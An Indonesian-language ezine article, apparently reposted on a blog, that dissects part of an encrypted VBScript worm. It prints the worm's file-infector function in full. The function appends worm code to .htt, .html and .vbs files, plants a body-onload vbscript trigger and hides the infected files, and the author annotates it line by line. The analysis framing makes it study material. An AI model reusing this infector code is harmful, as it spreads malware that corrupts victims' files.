Echo Magazine Issue 07 Phile 0x014

Published in

· 20 Aug 2020

  

 
        ____________________   ___ ___ ________ 
	\_   _____/\_   ___ \ /   |   \\_____  \ 
	 |    __)_ /    \  \//    ~    \/   |   \ 
	 |        \\     \___\    Y    /    |    \ 
	/_______  / \______  /\___|_  /\_______  / 
	        \/         \/       \/         \/ 

 
					    .OR.ID 
ECHO-ZINE RELEASE 
       07 

Author: knot |syuhada@antizionist.cjb.net 
Online @ www.echo.or.id :: http://ezine.echo.or.id 

 
== SECTION II == 

 
hai selamat datang di tutorial ke2 saya. melanjutkan tulisan saya yang  
pertama, dalam tulisan ini saya masih akan berusaha menjelaskan tentang  
vbsworm. setelah pada tutorial pertama saya yang telah menjelaskan   
tentang bagaimana membalik alur deskripsi worm yang terenkripsi untuk 
mendapatkan full source code. 

tekhnik2 yang saya gunakan dalam menyingkap source code vbsworm secara  
logika dapat diterapkan ke semua worm vbs yang terenkripsi karena kesemuanya  
mengandung logika yang sama. maka untuk itulah saya sangat menganjurkan  
kepada anda untuk mencoba mengerti baris demi baris, kode demi kode yang  
telah anda tulis ke dalam worm. 

dalam tutor ini saya akan membahas fungsi KLAppendTo() yang merupakan bagian  
pertama dalam worm  
yang telah saya bahas terdahulu.  

------- start code ----- 

[Function KLAppendTo()] 

-------- 
Function KJAppendTo(FilePath,TypeStr) 
On Error Resume Next 
Set ReadTemp = FSO.OpenTextFile(FilePath,1) 
TmpStr = ReadTemp.ReadAll 
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then 
ReadTemp.Close 
Exit Function 
End If 
If TypeStr = "htt" Then 
ReadTemp.Close 
Set FileTemp = FSO.OpenTextFile(FilePath,2) 
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText 
FileTemp.Close 
Set FAttrib = FSO.GetFile(FilePath) 
FAttrib.attributes = 34 
Else 
ReadTemp.Close 
Set FileTemp = FSO.OpenTextFile(FilePath,8) 
If TypeStr = "html" Then 
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText 
ElseIf TypeStr = "vbs" Then 
FileTemp.Write vbCrLf & VbsText 
End If 
FileTemp.Close 
End If 
End Function 
------- 

saya menyebut ini sebagai "Main Infector" knapa? karena fungsi ini bertanggung  
jawab atas tingkah worm yang paling menyebalkan, mengkopi dirinya.  
fungsi ini akan menginfeksi file2 dengan ekstension .htt .html .vbs sekaligus  
menset attribut nya. 

plus pada file html menambahkan rutin pengaktifan dalam tag html. <body onload> 

------- 

Function KJAppendTo(FilePath,TypeStr) <- menyatakan fungsi yang menerima 
					 input berupa variabel FilePath  
					 dan TypeStr. 

On Error Resume Next			<- Save Point 
				 
Set ReadTemp = FSO.OpenTextFile(FilePath,1) <- Baca file  

TmpStr = ReadTemp.ReadAll		<- mengisi variabel TmpStr dengan 
					   isi dari file Readtemp. 
					 
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then 	 
					<- baris ini berisi perintah untuk 
					   memanggil fungsi Instr() yang 
					   bertujuan mengidentifikasi file 
					   readTemp adalah worm atau bkn. 

	ReadTemp.Close			<- kalau worm, tutup file. 
	 
	Exit Function			<- keluar dari fungsi. 
End If 

If TypeStr = "htt" Then			<- jika ekstensinya .htt maka.. 
	 
ReadTemp.Close				<- tutup file 
						 
Set FileTemp = FSO.OpenTextFile(FilePath,2) <- buka kembali dengan mode 
						tulis. 

FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText 
					<- menulis FileTemp.  

FileTemp.Close				<- selesai tulis.. tutup file 

Set FAttrib = FSO.GetFile(FilePath)	<- rubah attribut file (hidden atau read only ,maybe) 
FAttrib.attributes = 34 

Else					<- buat file selain .htt 

ReadTemp.Close				<- tutup readtemp. 

Set FileTemp = FSO.OpenTextFile(FilePath,8) <- buka file dengan mode 8? (is anyone can explain thiz?) 

If TypeStr = "html" Then		<- kalo .html 

FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText 
					<- tulis lah.. virusnya. Variabel Htmltext berisi 
					   kode worm dalam format penginfeksi html. will 
					   explained later. 

ElseIf TypeStr = "vbs" Then		<- kalo .vbs 

FileTemp.Write vbCrLf & VbsText		<- tulis lagi virusnya, kalau sudah selesai tutup deh. 
End If 
FileTemp.Close 
End If 

End Function				<- akhir fungsi. 

 
demikian pembahasan baris per baris rutin ini, sebenarnya tidak ada yang istimewa dari rutin ini. 
sama saja seperti rutin2 penginfeksi dari worm2 vbs lain. tapi ini hanya sebagian dari keseluru 
han program worm yang saya janjikan untuk dibahas.  

mengenai tingkah laku dari worm dalam bagian ini, dapat kita lihat bahwa fungsi ini hanya merupa 
kan bagian dari sub routine yang lebih kompleks. fungsi ini mengolah input file dan menginfeksi 
nya.  

lebih lanjut kita akan membahas lebih dalam mengenai struktur worm ini.  

 
cya 

---- 

syuhada@antizionist.cjb.net 

----------

Echo Magazine Issue 07 Phile 0x014

Share this article

Let's discover also

Echo Magazine Issue 09 Phile 0x014

Echo Magazine Issue 03 Phile 0x014

Echo Magazine Issue 05 Phile 0x014

Echo Magazine Issue 07 Phile 0x014

Echo Magazine Issue 08 Phile 0x014

Echo Magazine Issue 09 Phile 0x013

Echo Magazine Issue 03 Phile 0x012

Echo Magazine Issue 05 Phile 0x001

Echo Magazine Issue 13 Phile 0x010

Echo Magazine Issue 10 Phile 0x001

Recent Articles

Maialetto

Dolcini sardi di Sinnai

Effe Turkish restaurant in Whitechapel

Red Lasagna mushrooms or aubegines

The enigma of the Shroud

Trofie pesto and tomatoes

Quinoa Vegetables and steamed Salmon

Piattoni saltati in padella con due pezzi di carne

Anatra all'arancia

Sunday Roast

Recent Comments